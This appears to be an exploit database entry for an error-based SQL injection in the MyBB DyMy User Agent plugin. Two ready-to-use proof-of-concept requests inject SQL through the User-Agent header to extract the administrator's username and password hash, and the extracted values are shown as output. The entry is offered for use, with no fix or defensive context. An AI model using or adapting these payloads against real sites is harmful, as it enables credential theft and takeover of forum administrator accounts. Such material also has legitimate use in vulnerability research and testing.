MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection

EDB-ID:

23359

CVE:

88439


Platform:

PHP

Published:

2012-12-13

############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en                                                        #
# Date : 13 Dec 2012                                                       #
# Tested on : Linux                                                        #
# Category : Web Applications                                              #
# Software Link : http://mods.mybb.com/view/dymy-user-agent                #
############################################################################


[*] PoC (receive admin username)

We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:

SQL Error:
1062 - Duplicate entry 'admin1' for key 'group_key'

+------------------------------------------------------------------+

[*] PoC (receive admin password)

We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error:
1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'

+------------------------------------------------------------------+


Enjoy.